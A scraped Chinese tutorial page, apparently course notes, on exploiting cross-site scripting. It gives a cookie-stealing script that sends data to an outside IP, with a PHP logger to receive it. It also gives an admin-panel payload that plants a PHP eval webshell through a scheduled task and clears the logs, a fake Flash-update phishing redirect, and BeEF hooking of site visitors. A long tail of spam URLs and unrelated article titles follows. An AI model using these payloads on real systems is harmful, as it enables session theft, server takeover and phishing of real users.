当前位置: 首页 > wzjs >正文

安丘网站建设多少钱陕西网站维护

wzjs 2025/9/14 16:08:14
安丘网站建设多少钱,陕西网站维护,自己搭建wordpress图床,下载学校网站模板下载地址目录 XSS跨站-攻击利用-凭据盗取 XSS跨站-攻击利用-数据提交 XSS跨站-攻击利用-flash钓鱼 XSS跨站-攻击利用-溯源综合 知识点: 1、XSS跨站-攻击利用-凭据盗取 2、XSS跨站-攻击利用-数据提交 3、XSS跨站-攻击利用-网络钓鱼 4、XSS跨站-攻击利用-溯源综合 漏洞原理…

目录

XSS跨站-攻击利用-凭据盗取

XSS跨站-攻击利用-数据提交

XSS跨站-攻击利用-flash钓鱼

XSS跨站-攻击利用-溯源综合

知识点:

1、XSS跨站-攻击利用-凭据盗取

2、XSS跨站-攻击利用-数据提交

3、XSS跨站-攻击利用-网络钓鱼

4、XSS跨站-攻击利用-溯源综合

漏洞原理:接受输入数据,输出显示数据后解析执行

基础类型:反射(非持续),存储(持续)DOM-BASE

拓展类型:jquery,mxss,uxss,pdfxss,flashxss,上传xss等

常用标签:https://www.freebuf.com/articles/web/340080.html

攻击利用:盲打,COOKIE盗取,凭据窃取,页面劫持,网络钓鱼,权限维持等

安全修复:字符过滤,实例化编码,http_only,CSP防护,WAF拦截等

测试流程:看输出想输入在哪里,更改输入代码看执行(标签,过滤决定)

XSS跨站-攻击利用-凭据盗取

条件:无防护Cookie凭据获取

把该XSS源码放到外网服务器上运行

登录前台测试账号

当用户申请提现时,管理员后台是能看到一些申请体现信息,这时候就会产生XSS漏洞

成功进入后台

触发代码

<script>var url='http://47.94.236.117/getcookie.php?u='+window.location.href+'&c='+document.cookie;document.write("<img src="+url+" />");</script>

47.94.236.117服务器上写一个getcookie.php脚本
接受:

<?php
$url=$_GET['u'];
$cookie=$_GET['c'];
$fp = fopen('cookie.txt',"a");
fwrite($fp,$url."|".$cookie."\n");
fclose($fp);
?>

XSS跨站-攻击利用-数据提交

条件:熟悉后台业务功能数据包,利用JS写一个模拟提交
利用:凭据获取不到或有防护无法利用凭据进入时执行其他
payload:

<script src="http://xx.xxx.xxx/poc.js"></script>

poc.js //要放在外网服务器WEB目录下,这个代码专门针对小皮面板写的

function poc(){js$.get('/service/app/tasks.php?type=task_list',{},function(data){var id=data.data[0].ID;$.post('/service/app/tasks.php?type=exec_task',{tid:id},function(res2){$.post('/service/app/log.php?type=clearlog',{},function(res3){},"json");},"json");},"json");
}
function save(){var data=new Object();data.task_id="";data.title="test";data.exec_cycle="1";data.week="1";data.day="3";data.hour="14";data.minute = "20";data.shell='echo "<?php @eval($_POST[123]);?>" >C:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';$.post('/service/app/tasks.php?type=save_shell',data,function(res){poc();},'json');
}
save();

管理员登陆后查看日志触发

XSS跨站-攻击利用-flash钓鱼

部署可访问的钓鱼页面并修改

点击立即下载后,就会下载木马文件

植入XSS代码等待受害者触发

<script>alert('当前浏览器Flash版本过低,请下载升级!');location.href='http://x.x.x.x/flash'</script>

点击确定后就会来到准备好的钓鱼页面,立即下载地址就可以填木马地址

项目地址:https://github.com/r00tSe7en/Fake-flash.cn

XSS跨站-攻击利用-溯源综合

XSS数据平台-XSSReceiver(这是给个人搭建的XSS平台,不想使用网上的XSS平台可以用这个项目)

简单配置即可使用,无需数据库,无需其他组件支持
项目地址:https://github.com/epoch99/BlueLotus_XSSReceiver-master
搭建非常简单,下载源码下来放入phpstudy目录下访问安装即可

浏览器控制框架-beef-xss

只需执行JS文件,即可实现对当前浏览器的控制,可配合各类手法利用
缺点:如果对方浏览器关闭,权限就会掉
搭建:docker run --rm -p 3000:3000 janes/beef //安装命令

这个代码插入到网站首页html里,这样当别人访问这个首页文件就会被劫持


文章转载自:

http://ItHHpGAG.hxbjt.cn
http://78dRPu5L.hxbjt.cn
http://wuoFUV8j.hxbjt.cn
http://StCi68tY.hxbjt.cn
http://bdcTVKFm.hxbjt.cn
http://bKh7rtAy.hxbjt.cn
http://Yhx2uZaI.hxbjt.cn
http://GID8lccr.hxbjt.cn
http://epCg37mB.hxbjt.cn
http://5MSpabH6.hxbjt.cn
http://mCi4QyNJ.hxbjt.cn
http://ajJpYIEC.hxbjt.cn
http://IWoIYTcH.hxbjt.cn
http://i4phLlje.hxbjt.cn
http://IzDwgYGG.hxbjt.cn
http://RgOn0VNh.hxbjt.cn
http://gJPY1BXK.hxbjt.cn
http://rs31L8Iw.hxbjt.cn
http://THtyaavQ.hxbjt.cn
http://p3KPY2Xh.hxbjt.cn
http://akyykq0Q.hxbjt.cn
http://4hrTD3bb.hxbjt.cn
http://GR0UQx28.hxbjt.cn
http://lQaeUnfh.hxbjt.cn
http://XkB1BhPG.hxbjt.cn
http://voVXAvxc.hxbjt.cn
http://RxYjOiIE.hxbjt.cn
http://GlnOhOfm.hxbjt.cn
http://nG2xRsON.hxbjt.cn
http://WqxHz0mC.hxbjt.cn
http://www.dtcms.com/wzjs/731660.html

相关文章:

  • 北京视频网站建设做网站的员工怎么设置绩效考核
  • 创建网站投资多少网站规划建设与安全管理
  • 做网站啦代理的方法阿里云wordpress很慢
  • 网站建设 落地页国外黄冈网站推广
  • 我的网站刚换了一个模板收录很多就是没排名wordpress微信打赏
  • 洛阳有做网站开发的吗网站开发过程说明怎么写
  • 做网站广告如何做网络营销推广就属金手指饣
  • 最便宜的网站建设中餐网站模板
  • 蚂蜂窝网站分析wordpress修订版本
  • 做网站威海建筑人才网上传不了论文
  • 山东建设工会网站南京专业网站优化公司
  • 如何替换网站的图片北京十大装饰装修公司
  • 贵州建设监理协会网站分销商城网站开发
  • 做网站可以临摹吗学校网站免费建设
  • 建网站的经历网络服务机构的域名是什么
  • 做网站的技术员提供深圳网站制作公司
  • 网站开发设计合同美丽乡村 村级网站建设
  • 广州网站搭建多少钱网站数据修改
  • 手机网站 设置青州网站建设
  • 新网站建设哪家好厦门有没有做网站的
  • 中化建工北京建设投资有限公司网站google官网入口
  • 怎么当网站站长浙江建设职业技术学校网站登录
  • 营销网站模板wordpress getfooter
  • pc网站开发制作个人网站起个名字
  • 企业网站建设讲解制作企业网站得多长时间
  • 一个电商网站开发周期是多久做网站月入7000
  • 网站建设时间规划建设部网站 43号文件
  • 做网站开发使用百分比的好处南宁网站建设策划方案
  • 网站流量的重要性wordpress图文主题
  • 网站开发 开题报告国产前端框架 做网站